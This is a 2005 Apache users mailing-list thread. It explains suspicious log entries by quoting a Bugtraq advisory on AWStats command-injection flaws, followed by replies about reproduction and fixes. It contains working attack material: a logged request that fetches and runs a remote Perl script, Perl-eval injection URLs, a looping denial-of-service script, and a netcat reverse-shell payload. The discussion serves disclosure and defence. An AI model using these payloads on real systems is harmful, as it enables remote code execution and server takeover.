My apache logs show rows after rows of following, all from various IP addresses. This started a couple of days ago. I don't have awstats. Could somebody tell me what is that? Is there anything I should be doing? thanks.K.GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20htt p://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl* ;echo|HTTP/1.1 ---------------------------------------------------------------------
Konstantine,provided you don't have one of the vulnerable verions of awstats installed just give a prayer of thanks. If you have a version covered by the following mail, try to disable or upgrade:
At 8:10 +0000 14/2/2005, GHC@xxxxxxxxxxxxxxxxxxxxx, [ru]@securityfocus.com@www.securit wrote:
X-VirusChecked: Checked X-Env-Sender: bugtraq-return-18123-dave.floyd=pa.press.net@securityfocus. com X-StarScan-Version: 5.4.11; banners=-,-,- X-Originating-IP: [205.206.231.27] X-SpamWhitelisted: domain whitelist Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx> List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx> List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx> List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx> Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx Date: 14 Feb 2005 08:10:40 -0000 From: GHC@xxxxxxxxxxxxxxxxxxxxx, [ru]@securityfocus.com@www.securityfocus.com <foster@xxxxxx> To: bugtraq@xxxxxxxxxxxxxxxxx Subject: AWStats <= 6.4 Multiple vulnerabilities /*==========================================*/ // GHC -> AWStats <- ADVISORY\\ PRODUCT: AWStats // VERSION: <= 6.3\\ URL: http://awstats.sourceforge.net/ // VULNERABILITY CLASS: Multiple vulnerabilities \\ RISK: high /*==========================================*/ [Product Description]"AWStats is a free powerful tool that generates advanced web, ftp or mail server statistics, graphically. This log analyzer works as a CGI or from command line and shows you all possible information your log contains,in few graphical web pages".Current stable version: AWStats 6.3 final Development version is 6.4 - 2005-02-06 14:31[Summary]Successful exploitation of an input validation vulnerability in AWStats scriptsallows attackers to execute limited perl directives under the privileges of the web server, get sensetive information. Some actions of the attacker can lead to denial of service. [Details] Some AWStats's functions can be extended with plugins. Two variables (loadplugin & pluginmode) are dealing with it.The first one (loadplugin) is responsible for plugins list (plugin1, plugin2); the second oneruns plugin's functions. Exploitable example (raw log plugin):http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadpl ugin=rawlogServer answer:192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606 192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606 192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/style.css HTTP/1.1" 200 2986 192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 200 7710 192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/logo.gif HTTP/1.1" 200 14443 192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif HTTP/1.1" 200 429 192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif HTTP/1.1" 200 2532 192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250 192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/vcss.gif HTTP/1.1" 200 1547 192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1" 200 7333 192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi HTTP/1.1" 200 7588 192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi HTTP/1.1" 200 7910 192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 7340 192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml HTTP/1.1" 200 153The dangerous fact is that attacker can read sensitive information such as IP address, admin scripts names, non encoded GET queries, etc.Our variables pass some verification (as others), but it is not enough for security:sub Sanitize { my $stringtoclean=shift; $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g; return $stringtoclean; } Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol.It's enough for variables with path to configuration files, but not for plugin tasks. In case of "loadplugin" & "pluginmode" developers obviously have a lot of trust to the user.So, let's see what can be done, in fact. [1] Perl code execution. http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent we'll get the action in next piece of code: # AWStats output is replaced by a plugin output if ($PluginMode) { my $function="BuildFullHTMLOutput_$PluginMode()"; eval("$function"); if ($? || $@) { error("$@"); } &html_end(0); exit 0; }If variable exists, we'll get code execution. This happens after sanitizing (see privious).Here we have intresting part in: my $function="BuildFullHTMLOutput_$PluginMode()"; eval("$function"); This is subroutine call (As example sub BuildFullHTMLOutput_rawlog() from rawlog.pm plugin). Ideal case: "module name"::BuildFullHTMLOutput_"function name"().But if we won't specify the name of module (with "loadplugin" parameter) we'll get the next:main::BuildFullHTMLOutput_"function name"().By the way, there is permited symbol ':' in user input parameters. So, we can send:PluginMode=:print+getpwent And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'. This will satisfy eval() requirements., and :print getpwent() is executed.http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:pri nt+getpwentSanitazing limits user's input, but there is no filtration for call sympols '()'.Here we can see that somebody can perform DoS attack. This is example of simple code for successful DoS exploitation: #!/usr/bin/perl use IO::Socket; $server = 'www.example.com'; sub ConnectServer {$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")|| die "Error\n";print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";print $socket "Host: $server\n"; print $socket "Accept: */*\n"; print $socket "\n\n"; } while () { $rp = rand; &ConnectServer; } [BUGFIX] Change vulnerable code for: sub PluginSanitize { my $stringtoclean=shift; $stringtoclean =~ s/[^\w]//g; return $stringtoclean; } [2] Arbitrary plugin including.http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../ usr/libdata/perl/5.00503/blibArbitrary module from user's input through "loadplugin" parameter can be included with "require" function..Bugfix - as above or something like this: opendir (PDIR, './plugins'); @FilesPDIR = readdir(PDIR); closedir (PDIR); foreach $FilesPName (@FilesPDIR) { if ($FilesPName =~ m/$loadplugin/) { } } The good thing is the poison null-byte (%00) has no place (transferes to 00).[3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).Every user can access debug function: http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1 http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2[DISCLOSURE TIMELINE] 10-02-2005 Initial vendor notification. 14-02-2005 No response.14-02-2005 Bug-traq post./* ================================================== */ /* www.ghc.ru -- security games & challenges */ /* ================================================== */ /* greets to: RST.void.ru, cr0n & all quest hunters %)*/ /* Special respect to e-defense. */ /* ================================================== */ At 16:24 +0100 15/2/2005, Ondra Holecek wrote:| | PluginMode=:print+getpwent | | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'. | This will satisfy eval() requirements., and :print getpwent() is executed. || http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:prin t+getpwent|| Sanitazing limits user's input, but there is no filtration for call sympols '()'.no, user is not limited, he can execute ANY command if he add ; at the end of the command, try this awstats.pl?&PluginMode=:print+system('id')+; or even this awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;At 14:25 -0500 15/2/2005, Jamie Pratt wrote:So what are the conditions of this bug/vuln? I can't reproduce this on several 6.3 installs..:awstats 6.3 from source: request:http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+sy stem('id')+;output: ****************Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory).***************At 20:52 +0100 15/2/2005, Ondra Holecek wrote:It seems this bug works only on my server, i dont know why /awstats.pl?&PluginMode=:print+system('id')+; reply: uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256 Error: Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory). awstats: Advanced Web Statistics 6.1 (build 1.751) (original) perl: This is perl, v5.8.5 built for i586-linux os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown unknown GNU/LinuxAt 16:38 -0500 15/2/2005, Herman Sheremetyev wrote:It works on mine too, though I still have 6.1. I think you may need to add the config=www.example.com into the url between the '?' and the '&' for it to work properly though. On my linux boxes with apache 2.0 it displays the command output in the page but on openbsd with apache 1.3 it gives a 500 Server Error because the output ends up in the headers somehow. Either way it works though.At 22:23 +0100 15/2/2005, Ondra Holecek wrote:im sorry i didnt write it, only awstat 6.1 and 6.2 is vulnerable to this bug (system('id'), etc.)At 12:53 -0800 15/2/2005, William Pratt wrote:Same thing here on both 6.3 and 6.4. I am unable to reproduce this.Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.Setup ('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' f ile, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory).William Pratt Sr. Engineering Application Developer Megapath Networks, Inc. Http://www.MegaPath.netI wish there was a knob on the TV to turn up the intelligence. There's a knob called "brightness", but it doesn't seem to work.At 17:19 -0500 15/2/2005, Jeffrey Wilkinson wrote:Nonetheless, each of these causes AWstats to disclose the full path to the AWstats installation, regardless if *nix or Windows. That alone is enough for concern.At 14:00 -0700 15/2/2005, twebster@xxxxxxxxxxx wrote:You may need to specify an awstats config to view example:http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&Pl uginMode=:print+system('id')+;At 16:46 -0500 15/2/2005, Jamie Pratt wrote:Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same error. So.. Can we all agree that 6.3 is not vulnerable, because I'd rather not upgrade to a dev/unstable release for no reason...At 9:47 -0500 16/2/2005, Thom Craver wrote:I can confirm the bug on 6.3 running Apache 2.0.52.Furthermore, ANY system command inserted in the system() call can be executed. This is a very serious bug. Unpriviledged user or not, with an .rhosts file on a potential attacker's end, scp would work just nicely, then a chmod, then execution of any script they wanted to upload.This issue is not to be taken lightly. Until this issue is resolved, we have commented out the Plugin lines: # AWStats output is replaced by a plugin output if ($PluginMode) { my $function="BuildFullHTMLOutput_$PluginMode()"; eval("$function"); if ($? || $@) { error("$@"); } &html_end(0); exit 0; } If a plugin is called, it is apparently ignored and the stats are displayed. -- Thom Craver Corporate Communications, Inc. www.corp-com.comAt 7:45 +0000 16/2/2005, K-OTiK Security wrote:6.4 was released on 2005-02-14 13:13 Fixes: - Fix security hole that allowed a user to read log file content even when plugin rawlog was not enabled. - Fix a possible use of AWStats for a DoS attack. - configdir option was broken on windows servers. - Minor fixes Regards K-OTik Security Research & Monitoring Team 24/7 http://www.k-otik.com/englishAt 15:52 -0500 16/2/2005, Micah Brandon wrote:I'm going to have to disagree. Execution of Perl functions is still possible in 6.3. You just have to jimmy it a little and try/guess different plugins that may be installed. I got a hit with 'hostinfo'. Try this on your server: http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+timeUnix time shows up just below 'Whois command failed' error message. That's game over in my book.At 20:34 -0500 16/2/2005, Michael Scheidell wrote:And the skiddies who tried to exploit something that didn't exist on our site: (this goes on for some time, here is just a snipp) So, anyone out there who decided to do a 'wait and see', don't. Disable awstats, use access rules, upgrade it or all three. 217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET //cgi-bin/awstats/awstats. pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6. 0; Windows 98)" 217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET //cgi-bin/awstats.pl?confi gdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windo ws 98)" 64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats/awstats.pl? configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats.pl?configdi r=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|% 20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //awstatswwwroot/cgi-bin/awst ats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSI E 6.0; Windows 98)" 64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|% 20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/cgi-bin/awstats.pl? configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/ cgi-bin/awstats.plAt 14:01 -0500 17/2/2005, Matt Wilder wrote:Awstats version 5.6 is not succeptable to this as it does not have the same plugin architecture. Could this be a >= 6.0 bug?At 14:46 +0000 18/2/2005, newbug Tseng wrote:Hi.Please check http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdfthere're some code analysis for awstats.At 22:26 +0000 3/5/2005, Laurent Destailleur wrote:>Subject: AWStats <= 6.4 Multiple vulnerabilitiesMust read AWStats <= 6.3. Version 6.4 is not affected.
rgds --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See <URL:http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx